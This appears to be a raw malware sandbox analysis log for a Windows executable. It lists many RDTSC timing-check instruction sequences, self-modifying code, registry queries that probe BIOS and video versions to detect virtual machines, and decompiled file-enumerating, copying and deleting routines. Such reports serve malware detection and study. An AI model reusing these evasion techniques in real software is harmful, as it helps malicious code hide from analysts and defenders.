Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A82BCD second address: A82BF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0C9CD54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c jmp 00007FF7B0C9CD4Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A82BF6 second address: A82BFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A82BFB second address: A82C1A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FF7B0C9CD4Fh 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push ecx 0x0000000d jg 00007FF7B0C9CD46h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A82C1A second address: A82C2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push esi 0x00000006 jmp 00007FF7B0F3BFCCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A8B683 second address: A8B6A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FF7B0C9CD55h 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A8B238 second address: A8B23C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A8B23C second address: A8B242 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A9B1D7 second address: A9B1F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0F3BFD5h 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A9D7A4 second address: A9D7B0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A9D45A second address: A9D46C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF7B0F3BFCEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB4F40 second address: AB4F71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF7B0C9CD59h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jmp 00007FF7B0C9CD4Fh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB4F71 second address: AB4F90 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 jmp 00007FF7B0F3BFD2h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB4F90 second address: AB4F96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB4F96 second address: AB4F9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB5383 second address: AB5387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB577A second address: AB577F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB6265 second address: AB626F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF7B0C9CD46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB626F second address: AB629B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0F3BFCAh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FF7B0F3BFD2h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jo 00007FF7B0F3BFC6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB9C4D second address: AB9C56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB9C56 second address: AB9C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FF7B0F3BFD1h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB9C73 second address: AB9C77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB9C77 second address: AB9C7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB9C7B second address: AB9C81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB9C81 second address: AB9C87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB9C87 second address: AB9C8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB994C second address: AB995C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FF7B0F3BFCAh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB995C second address: AB9962 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AB9962 second address: AB99A6 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF7B0F3BFC6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnl 00007FF7B0F3BFCEh 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 jns 00007FF7B0F3BFC8h 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FF7B0F3BFD7h 0x00000022 jnc 00007FF7B0F3BFC6h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AC48DC second address: AC48F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF7B0C9CD4Dh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AC48F3 second address: AC48F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AC48F7 second address: AC48FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AC7981 second address: AC7987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AC7987 second address: AC798B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AC798B second address: AC79AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0F3BFD9h 0x00000007 jnp 00007FF7B0F3BFC6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AC79AE second address: AC79B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AD7EBE second address: AD7ECC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AD7ECC second address: AD7ED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: ADA881 second address: ADA8A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0F3BFD5h 0x00000007 je 00007FF7B0F3BFDEh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AF0279 second address: AF0297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF7B0C9CD46h 0x0000000a jmp 00007FF7B0C9CD52h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AEF134 second address: AEF13A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AEF13A second address: AEF15A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF7B0C9CD57h 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AEF2B1 second address: AEF2B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AEFE58 second address: AEFE6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF7B0C9CD4Eh 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AF1863 second address: AF1868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AF4187 second address: AF4195 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF7B0C9CD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AF5CC3 second address: AF5CD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007FF7B0F3BFC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AF5CD3 second address: AF5CD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AF7AB8 second address: AF7ABE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AF7ABE second address: AF7AE3 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF7B0C9CD46h 0x00000008 jmp 00007FF7B0C9CD55h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ecx 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5150367 second address: 5150377 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF7B0F3BFCCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5150377 second address: 51503A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0C9CD4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov edx, 070E8EEAh 0x00000012 push eax 0x00000013 push edx 0x00000014 call 00007FF7B0C9CD51h 0x00000019 pop esi 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 51503A3 second address: 51503D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push esi 0x0000000c pop edx 0x0000000d pushfd 0x0000000e jmp 00007FF7B0F3BFD2h 0x00000013 sbb al, 00000008h 0x00000016 jmp 00007FF7B0F3BFCBh 0x0000001b popfd 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5150477 second address: 5150493 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, bx 0x00000006 call 00007FF7B0C9CD4Bh 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5150493 second address: 5150497 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5150497 second address: 51504A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0C9CD4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 51504A7 second address: 51504AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 51504AD second address: 51504B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 86FAF7 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 86FBF4 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: A06402 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: A926E4 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe | Evaded block: after key decision (graph_0-26878)
Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetSystemTime,DecisionNodes (graph_0-25696)
Source: C:\Users\user\Desktop\file.exe | API coverage: 4.7 %
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006318A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00633910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00633910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00631269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00631269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00631250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00631250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0063E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0063E210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00634B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00634B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00634B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00634B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0063CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0063CBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006323A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_006323A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0062DB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00632390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_00632390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0062DB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0063DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_0063DD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0063D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0063D530
